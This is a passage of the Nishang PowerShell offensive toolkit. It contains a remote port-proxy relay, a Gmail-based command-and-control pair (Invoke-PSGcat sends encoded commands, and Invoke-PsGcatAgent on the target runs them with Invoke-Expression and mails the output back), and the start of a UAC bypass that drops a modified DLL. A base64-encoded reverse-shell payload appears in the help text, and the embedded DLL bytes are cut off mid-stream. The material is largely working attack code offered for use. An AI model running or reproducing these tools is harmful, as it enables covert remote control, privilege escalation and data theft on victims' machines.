6133 #Create a scriptblock depending upon the type of relay.
6134 switch ($Relay)
6135 {
6136 "v4tov4"
6137 {
6138 $sb = [ScriptBlock]::Create($V4toV4Relay)
6139 Write-Output "Initiating v4tov4 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6140 }
6141 "v6tov4"
6142 {
6143 $sb = [ScriptBlock]::Create($V6toV4Relay)
6144 Write-Output "Initiating v6tov4 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6145 }
6146 "v4tov6"
6147 {
6148 $sb = [ScriptBlock]::Create($V4toV6Relay)
6149 Write-Output "Initiating v4tov6 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6150 }
6151 "v6tov6"
6152 {
6153 $sb = [ScriptBlock]::Create($V6toV6Relay)
6154 Write-Output "Initiating v6tov6 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6155 }
6156 }
6157
6158 #Execute the netsh command on remote computer
6159 if ($Creds)
6160 {
6161 Invoke-Command -ScriptBlock $sb -ComputerName $ComputerName -Credential $Creds
6162 Invoke-Command -ScriptBlock {param ($SBRelay) netsh interface portproxy show $SBRelay } -ArgumentList $Relay -ComputerName $ComputerName -Credential $Creds
6163 }
6164 else
6165 {
6166 Invoke-Command -ScriptBlock $sb -ComputerName $ComputerName
6167 Invoke-Command -ScriptBlock {netsh interface portproxy show $Relay } -ComputerName $ComputerName
6168 }
6169 }
6170 if ($Delete)
6171 {
6172 #Relay commands for deletion
6173 $V4tov4Relay = "netsh interface portproxy delete v4tov4 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp"
6174 $V6toV4Relay = "netsh interface portproxy delete v6tov4 listenport=$ListenPort listenaddress=$ListenAddress"
6175 $V4tov6Relay = "netsh interface portproxy delete v4tov6 listenport=$ListenPort listenaddress=$ListenAddress"
6176 $V6toV6Relay = "netsh interface portproxy delete v6tov6 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp"
6177
6178 #Create a scriptblock for deleting the relay, depending upon its type.
6179 switch ($Relay)
6180 {
6181 "v4tov4"
6182 {
6183 $sbdelete = [ScriptBlock]::Create($V4toV4Relay)
6184 Write-Output "Deleting v4tov4 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6185 }
6186 "v6tov4"
6187 {
6188 $sbdelete = [ScriptBlock]::Create($V6toV4Relay)
6189 Write-Output "Deleting v6tov4 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6190 }
6191 "v4tov6"
6192 {
6193 $sbdelete = [ScriptBlock]::Create($V4toV6Relay)
6194 Write-Output "Deleting v4tov6 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6195 }
6196 "v6tov6"
6197 {
6198 $sbdelete = [ScriptBlock]::Create($V6toV6Relay)
6199 Write-Output "Deleting v6tov6 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6200 }
6201 }
6202
6203 #Execute the netsh command on remote computer
6204 if ($Creds)
6205 {
6206 Invoke-Command -ScriptBlock $sbdelete -ComputerName $ComputerName -Credential $Creds
6207 Invoke-Command -ScriptBlock {param ($SBRelay) netsh interface portproxy show $SBRelay } -ArgumentList $Relay -ComputerName $ComputerName -Credential $Creds
6208 }
6209 else
6210 {
6211 Invoke-Command -ScriptBlock $sbdelete -ComputerName $ComputerName
6212 Invoke-Command -ScriptBlock {netsh interface portproxy show $Relay } -ComputerName $ComputerName
6213 }
6214 }
6215}
6216
6217
6218########################################## Gcat - Using Gmail for code execution ######################################
6219
6220########################################## Invoke-PSGcat needs to be run on attacker's machine ########################
6221function Invoke-PSGcat
6222{
6223<#
6224.SYNOPSIS
6225Nishang script which can be used to send commands and scripts to Gmail which can then be run on a target using Invoke-PSGcatAgent.
6226
6227.DESCRIPTION
6228This script is capable of sending commands and/or scripts to Gmail. A valid Gmail username and password is required.
6229The command is compressed and base64 encoded and sent to the Gmail account. On the target, Invoke-PsGcatAgent must be executed
6230which will read the last sent command/script, decode it, execute it and send the output back to Gmail.
6231In the Gmail security settings of that account "Access for less secure apps" must be turned on. Make sure that you use
6232a throw away account.
6233
6234In the interactive mode, to execute a script, type "script" at the PsGcat prompt and provide full path to the script.
6235To read output, type "GetOutput" at the PsGcat prompt.
6236
6237Currently, the output is not pretty at all and you will see the script interacting with Gmail IMAP.
6238
6239.PARAMETER Username
6240Username of the Gmail account you want to use.
6241
6242.PARAMETER Password
6243Password of the Gmail account you want to use.
6244
6245.PARAMETER AgentID
6246AgentID is currently unused and would be used with multiple agent support in future.
6247
6248.PARAMETER Payload
6249In Non-interactive mode, the PowerShell command you want to send to the Gmail account.
6250
6251.PARAMETER ScriptPath
6252In Non-interactive mode, the PowerShell script you want to send to the Gmail account.
6253
6254.PARAMETER NonInteractive
6255Use the non-interactive mode. Execute the provided command or payload and exit.
6256
6257.PARAMETER GetOutput
6258Retrieve last ouput from Gmail.
6259
6260.EXAMPLE
6261PS > Invoke-PSGcat -Username psgcatlite -password pspassword
6262Use GetOutput to get output.
6263Use Script to specify a script.
6264PsGcat: Get-Process
6265Command sent to psgcatlite@gmail.com
6266
6267
6268Above shows an example where Get-Process is sent to Gmail.
6269
6270.EXAMPLE
6271PS > Invoke-PSGcat -Username psgcatlite -password pspassword
6272Use GetOutput to get output.
6273Use Script to specify a script.
6274PsGcat: GetOutput
6275-----Lot of IMAP text-----
6276* 8 FETCH (BODY[TEXT] {5206}
6277System.Diagnostics.Process (BTHSAmpPalService) System.Diagnostics
6278.Process (BTHSSecurityMgr) System.Diagnostics.Process (btplayerct
6279rl) System.Diagnostics.Process (capiws) System.Diagnostics.Proces
6280s (conhost) System.Diagnostics.Process (conhost) System.Diagnosti
6281
6282
6283Above shows how to retrieve output from Gmail. Note that the output is ugly and you may need to run GetOutput few times
6284before the complete output is read. Also, the Invoke-PsGcatAgent must execute the command before an output could be retrieved.
6285
6286
6287.EXAMPLE
6288PS > Invoke-PSGcat -Username psgcatlite -password pspassword
6289Use GetOutput to get output.
6290Use Script to specify a script.
6291PsGcat: script
6292Provide complete path to the PowerShell script.: C:\test\reverse_powershell.ps1
6293Command sent to psgcatlite@gmail.com
6294Use GetOutput to get output.
6295
6296
6297Use above to send a PowerShell script to the Gmail account. Script execution is not very reliable right now and you may see
6298the agent struggling to pull a big encoded script. Also, make sure that the function call for script is done from the
6299script itself.
6300
6301.EXAMPLE
6302PS > Invoke-PSGcat -Username psgcatlite -password pspassword -Payload Get-Service -NonInteractive
6303Send a command to the Gmail account without any interaction.
6304
6305.EXAMPLE
6306PS > Invoke-PSGcat -Username psgcatlite -password pspassword -ScriptPath C:\test\reverse_powershell.ps1 -NonInteractive
6307Send a script to the Gmail account without any interaction.
6308
6309.EXAMPLE
6310PS > Invoke-PSGcat -Username psgcatlite -password pspassword -GetOutput
6311Get output from the gmail account.
6312
6313.LINK
6314http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
6315https://github.com/samratashok/nishang
6316#>
6317 [CmdletBinding(DefaultParameterSetName="Interactive")] Param(
6318
6319 [Parameter(Position = 0, Mandatory = $false, ParameterSetName="Interactive")]
6320 [Parameter(Position = 0, Mandatory = $false, ParameterSetName="NonInteractive")]
6321 [String]
6322 $Username,
6323
6324 [Parameter(Position = 1, Mandatory = $false, ParameterSetName="Interactive")]
6325 [Parameter(Position = 1, Mandatory = $false, ParameterSetName="NonInteractive")]
6326 [String]
6327 $Password,
6328
6329 [Parameter(Position = 2, Mandatory = $false, ParameterSetName="Interactive")]
6330 [Parameter(Position = 2, Mandatory = $false, ParameterSetName="NonInteractive")]
6331 [String]
6332 $AgentID,
6333
6334 [Parameter(Position = 3, Mandatory = $false, ParameterSetName="NonInteractive")]
6335 [String]
6336 $Payload,
6337
6338 [Parameter(Position = 4, Mandatory = $false, ParameterSetName="NonInteractive")]
6339 [String]
6340 $ScriptPath,
6341
6342 [Parameter(Mandatory = $false, ParameterSetName="NonInteractive")]
6343 [Switch]
6344 $NonInteractive,
6345
6346 [Parameter(Mandatory = $false)]
6347 [Switch]
6348 $GetOutput
6349
6350 )
6351 #$ErrorActionPreference = "SilentlyContinue"
6352
6353 function SendCommand ($Payload, $Username, $Password)
6354 {
6355
6356 try
6357 {
6358 $ms = New-Object IO.MemoryStream
6359 $action = [IO.Compression.CompressionMode]::Compress
6360 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
6361 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
6362 $Payload | ForEach-Object {$sw.WriteLine($_)}
6363 $sw.Close()
6364
6365 # Base64 encode stream
6366 $Compressed = [Convert]::ToBase64String($ms.ToArray())
6367
6368 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
6369 $smtpserver = "smtp.gmail.com"
6370 $msg = new-object Net.Mail.MailMessage
6371 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
6372 $smtp.EnableSsl = $True
6373 $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
6374 $msg.From = "$username@gmail.com"
6375 $msg.To.Add("$username@gmail.com")
6376 $msg.Subject = "Command"
6377 $msg.Body = "##" + $Compressed
6378 $smtp.Send($msg)
6379 Write-Output "Command sent to $username@gmail.com"
6380 }
6381 catch
6382 {
6383 Write-Warning "Something went wrong! Check if Username/Password are correct and you can connect to gmail from insecure apps."
6384 Write-Error $_
6385 }
6386 }
6387
6388 function ReadResponse
6389 {
6390 try
6391 {
6392 $tcpClient = New-Object -TypeName System.Net.Sockets.TcpClient
6393
6394 # Connect to gmail
6395 $tcpClient.Connect("imap.gmail.com", 993)
6396
6397 if($tcpClient.Connected)
6398 {
6399 # Create new SSL Stream for tcpClient
6400 [System.Net.Security.SslStream] $sslStream = $tcpClient.GetStream()
6401
6402 # Authenticating as client
6403 $sslStream.AuthenticateAsClient("imap.gmail.com");
6404
6405 if($sslStream.IsAuthenticated)
6406 {
6407 # Asssigned the writer to stream
6408 [System.IO.StreamWriter] $sw = $sslstream
6409
6410 # Assigned reader to stream
6411 [System.IO.StreamReader] $reader = $sslstream
6412 $script:result = ""
6413 $sb = New-Object System.Text.StringBuilder
6414 $mail =""
6415 $responsebuffer = [Array]::CreateInstance("byte", 2048)
6416
6417
6418 function ReadResponse ($command)
6419 {
6420 $sb = New-Object System.Text.StringBuilder
6421 if ($command -ne "")
6422 {
6423 $buf = [System.Text.Encoding]::ASCII.GetBytes($command)
6424 $sslStream.Write($buf, 0, $buf.Length)
6425 }
6426 $sslStream.Flush()
6427 $bytes = $sslStream.Read($responsebuffer, 0, 2048)
6428 $str = $sb.Append([System.Text.Encoding]::ASCII.GetString($responsebuffer))
6429 $sb.ToString()
6430 $temp = $sb.ToString() | Select-String "\* SEARCH"
6431 if ($temp)
6432 {
6433 $fetch = $temp.ToString() -split "\$",2
6434 $tmp = $fetch[0] -split "\* SEARCH " -split " " -replace "`n"
6435 [int]$mail = $tmp[-1]
6436 $cmd = ReadResponse("$ FETCH $mail BODY[TEXT]`r`n", "1")
6437 $cmd -replace '='
6438 }
6439 }
6440 ReadResponse ""
6441 ReadResponse ("$ LOGIN " + "$Username@gmail.com" + " " + "$Password" + " `r`n") | Out-Null
6442 ReadResponse("$ SELECT INBOX`r`n") | Out-Null
6443 ReadResponse("$ SEARCH SUBJECT `"Output`"`r`n")
6444 ReadResponse("$ LOGOUT`r`n") | Out-Null
6445 }
6446 else
6447 {
6448 Write-Error "You were not authenticated. Quitting."
6449 }
6450 }
6451 else
6452 {
6453 Write-Error "You are not connected to the host. Quitting"
6454 }
6455 }
6456
6457 catch
6458 {
6459 Write-Warning "Something went wrong! Check if Username/Password are correct, you can connect to gmail from insecure apps and if there is output email in the inbox"
6460 Write-Error $_
6461 }
6462 }
6463
6464 #For only reading the output.
6465 if ($GetOutput)
6466 {
6467 Write-Verbose "Reading Output from Gmail"
6468 ReadResponse ""
6469 }
6470 #Non interactive
6471 elseif ($NonInteractive)
6472 {
6473 #If Scriptpath is provided, read the script.
6474 if ($ScriptPath)
6475 {
6476 $Payload = [IO.File]::ReadAllText("$ScriptPath") -replace "`n"
6477 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6478 SendCommand $Payload $Username $Password
6479 }
6480 #else use the command
6481 else
6482 {
6483 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6484 SendCommand $Payload $Username $Password
6485 }
6486
6487 }
6488 #Interactive prompt
6489 else
6490 {
6491 while($Payload -ne "exit")
6492 {
6493
6494 Write-Output "Use GetOutput to get output."
6495 Write-Output "Use Script to specify a script."
6496 $Payload = Read-Host -Prompt "PsGcat"
6497 if ($Payload -eq "GetOutput")
6498 {
6499 Write-Verbose "Reading Output from Gmail"
6500 ReadResponse ""
6501 }
6502 if ($Payload -eq "Script")
6503 {
6504 $path = Read-Host -Prompt "Provide complete path to the PowerShell script."
6505 $Payload = [IO.File]::ReadAllText("$path") -replace "`n"
6506 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6507 SendCommand $Payload $Username $Password
6508 }
6509 else
6510 {
6511 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6512 SendCommand $Payload $Username $Password
6513 }
6514 }
6515 }
6516}
6517
6518########################################## Invoke-PsGcatAgent needs to be run on target machine ########################
6519function Invoke-PsGcatAgent
6520{
6521<#
6522.SYNOPSIS
6523Nishang script which can be used to execute commands and scripts from Gmail uploaded by Invoke-PSGcat.
6524
6525.DESCRIPTION
6526This script is capable of executing commands and/or scripts from Gmail and send the output back.
6527A valid Gmail username and password is required.
6528This script must be executed on the target and commands should be uploaded by Invoke-PsGcat on attacker's machine.
6529
6530In the Gmail security settings of that account "Access for less secure apps" must be turned on. Make sure that you use
6531a throw away account.
6532
6533Script execution is not very reliable right now and you may see the agent struggling to pull a big encoded script.
6534
6535.PARAMETER Username
6536Username of the Gmail account you want to use.
6537
6538.PARAMETER Password
6539Password of the Gmail account you want to use.
6540
6541.PARAMETER AgentID
6542AgentID is currently unused and would be used with multiple agent support in future.
6543
6544.PARAMETER Delay
6545Delay in seconds after a successful execution. Default is 60.
6546
6547.EXAMPLE
6548PS > Invoke-PSGcatAgent -Username psgcatlite -password pspassword -Delay 10
6549Pull latest command/script from Gmail and execute with a delay of 10 seconds.
6550
6551.LINK
6552http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
6553https://github.com/samratashok/nishang
6554#>
6555
6556 [CmdletBinding()] Param(
6557
6558 [Parameter(Position = 0, Mandatory = $false)]
6559 [String]
6560 $Username,
6561
6562 [Parameter(Position = 1, Mandatory = $false)]
6563 [String]
6564 $Password,
6565
6566 [Parameter(Position = 2, Mandatory = $false)]
6567 [String]
6568 $AgentID,
6569
6570 [Parameter(Position = 3, Mandatory = $false)]
6571 [String]
6572 $Delay = 60
6573 )
6574
6575
6576 $ErrorActionPreference = "SilentlyContinue"
6577
6578 while ($true)
6579 {
6580 try
6581 {
6582
6583 #Basic IMAP interaction from http://learningpcs.blogspot.in/2012/01/powershell-v2-read-gmail-more-proof-of.html
6584 $tcpClient = New-Object -TypeName System.Net.Sockets.TcpClient
6585
6586 # Connect to gmail
6587 $tcpClient.Connect("imap.gmail.com", 993)
6588 if($tcpClient.Connected)
6589 {
6590 # Create new SSL Stream for tcpClient
6591 [System.Net.Security.SslStream] $sslStream = $tcpClient.GetStream()
6592
6593 # Authenticating as client
6594 $sslStream.AuthenticateAsClient("imap.gmail.com");
6595 $script:result = ""
6596 $sb = New-Object System.Text.StringBuilder
6597 $mail =""
6598 $responsebuffer = [Array]::CreateInstance("byte", 2048)
6599
6600 #Send IMAP commands and read response
6601 function ReadResponse ($command, $ReturnResult)
6602 {
6603 $sb = New-Object System.Text.StringBuilder
6604 if ($command -ne "")
6605 {
6606 $command
6607 $buf = [System.Text.Encoding]::ASCII.GetBytes($command)
6608 $sslStream.Write($buf, 0, $buf.Length)
6609 }
6610 $sslStream.Flush()
6611 $bytes = $sslStream.Read($responsebuffer, 0, 2048)
6612 $str = $sb.Append([System.Text.Encoding]::ASCII.GetString($responsebuffer))
6613 $sb.ToString()
6614
6615 #Select the output of SEARCH IMAP command
6616 $temp = $sb.ToString() | Select-String "\* SEARCH"
6617 if ($temp)
6618 {
6619 $fetch = $temp.ToString() -split "\$",2
6620 $tmp = $fetch[0] -split "\* SEARCH " -split " " -replace "`n"
6621 [int]$mail = $tmp[-1]
6622
6623 #FETCH the body of the last email which matches the SEARCH criteria
6624 $cmd = ReadResponse("$ FETCH $mail BODY[TEXT]`r`n", "1")
6625 $tmp = $cmd[2] -split "\)",2 -replace "`n"
6626 $TempCommand = ($tmp[0] -split "##",2)[1] -replace "(?<=\=)3D" -replace "`r"
6627 $EncCommand = $TempCommand -replace '(?!={1,2}$)=','' -replace "`r"
6628 Write-Verbose "Executing Encoded Command $EncCommand"
6629 #Decode
6630 $dec = [System.Convert]::FromBase64String($EncCommand)
6631 $ms = New-Object System.IO.MemoryStream
6632 $ms.Write($dec, 0, $dec.Length)
6633 $ms.Seek(0,0) | Out-Null
6634 $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
6635 $sr = New-Object System.IO.StreamReader($cs)
6636 $cmd = $sr.readtoend()
6637 $result = Invoke-Expression $cmd -ErrorAction SilentlyContinue
6638
6639 #Send results to gmail
6640 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
6641 $smtpserver = "smtp.gmail.com"
6642 $msg = new-object Net.Mail.MailMessage
6643 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
6644 $smtp.EnableSsl = $True
6645 $smtp.Credentials = New-Object System.Net.NetworkCredential("$Username", "$Password");
6646 $msg.From = "$Username@gmail.com"
6647 $msg.To.Add("$Username@gmail.com")
6648 $msg.Subject = "Output from $env:Computername"
6649 $msg.Body = $result
6650 $smtp.Send($msg)
6651 }
6652 }
6653
6654 #Interact with Gmail using IMAP
6655 ReadResponse ""
6656 ReadResponse ("$ LOGIN " + "$Username@gmail.com" + " " + "$Password" + " `r`n") | Out-Null
6657 ReadResponse("$ SELECT INBOX`r`n") | Out-Null
6658 ReadResponse("$ SEARCH SUBJECT `"Command`"`r`n")
6659 ReadResponse("$ LOGOUT`r`n") | Out-Null
6660 Start-Sleep -Seconds $Delay
6661
6662 }
6663
6664 else
6665 {
6666 Write-Error "You are not connected to the host. Quitting"
6667 }
6668
6669 }
6670 catch
6671 {
6672 $_
6673 }
6674 }
6675}
6676
6677
6678
6679
6680
6681
6682######################################### Invoke-PsUACme ###############################################################
6683function Invoke-PsUACme
6684{
6685<#
6686.SYNOPSIS
6687Nishang script which uses known methods to bypass UAC.
6688
6689.DESCRIPTION
6690This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
6691It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables
6692to bypass UAC. Following methods (named mostly on the basis of executables used) are implemented: "sysprep","oobe","ActionQueue",
6693"migwiz","cliconfg","winsat" and "mmc"
6694
6695The DLLs dropped by the script is a modified version of Fubuki from the UACME project. It needs separate DLLs for 64 bit and 32 bit machines.
6696It is able to determine the bit-ness of the process from which it is called and uses the apt DLL.
6697
6698The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided
6699to the Payload parameter ends up in this batch file.
6700
6701Wusa.exe on Windows 10 has not "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently.
6702A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually.
6703The script must be run from a process running with medium integrity.
6704
6705.PARAMETER Payload
6706Payload to be executed from the elevated process. Default one checks of the elevation was successful.
6707
6708.PARAMETER method
6709The method to be used for elevation. Defaut one is sysprep.
6710
6711.PARAMETER PayloadPath
6712The path to the payload. The default one is C:\Windows\temp\cmd.bat. To change this, change the path in DLL as well.
6713
6714.PARAMETER CustomDLL64
6715Path to a custom 64 bit DLL.
6716
6717.PARAMETER CustomDLL32
6718Path to a custom 32 bit DLL.
6719
6720.PARAMETER $DllBytes64
6721Default 64 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
6722
6723.PARAMETER $DllBytesew
6724Default 32 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
6725
6726.EXAMPLE
6727PS > Invoke-PsUACme -Verbose
6728Above command runs the sysprep method and the default payload.
6729
6730.EXAMPLE
6731PS > Invoke-PsUACme -method oobe -Verbose
6732Above command runs the oobe method and the default payload.
6733
6734.EXAMPLE
6735PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=="
6736Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell
6737(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the
6738Utility directory of Nishang.
6739
6740The reverse shell in above case runs with elevated privileges.
6741
6742.LINK
6743http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
6744https://github.com/samratashok/nishang
6745#>
6746
6747
6748 [CmdletBinding()] Param(
6749
6750 [Parameter(Position = 0, Mandatory = $False)]
6751 [String]
6752 $Payload = 'powershell.exe -noexit -c "if ([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ''S-1-5-32-544'')) {Write-Output ''You have elevated/Administrator rights!''}"',
6753
6754 [Parameter(Position = 1, Mandatory = $False)]
6755 [ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")]
6756 [String]
6757 $method = "sysprep",
6758
6759 [Parameter(Position = 2, Mandatory = $False)]
6760 [String]
6761 $PayloadPath = "C:\Windows\temp\cmd.bat",
6762
6763 [Parameter(Position = 3, Mandatory = $False)]
6764 [String]
6765 $CustomDll64,
6766
6767 [Parameter(Position = 4, Mandatory = $False)]
6768 [String]
6769 $CustomDll32,
6770
6771 [Parameter(Position = 5, Mandatory = $False)]
6772 [String]
6773 $DllBytes64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 4 0 250 130 9 86 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 4 0 0 0 16 0 0 0 0 0 0 168 17 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 19 147 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 176 34 0 0 148 3 0 0 68 38 0 0 60 0 0 0 0 64 0 0 224 4 0 0 0 48 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 120 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 52 3 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 242 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 112 100 97 116 97 0 0 24 0 0 0 0 48 0 0 0 2 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 64 0 0 0 6 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 194 0 0 204 72 137 92 36 24 85 86 87 72 141 108 36 185 72 129 236 224 0 0 0 51 246 72 141 69 111 72 33 117 111 72 141 21 87 16 0 0 33 117 103 65 185 25 0 2 0 69 51 192 72 137 68 36 32 72 199 193 1 0 0 128 255 21 193 15 0 0 133 192 15 133 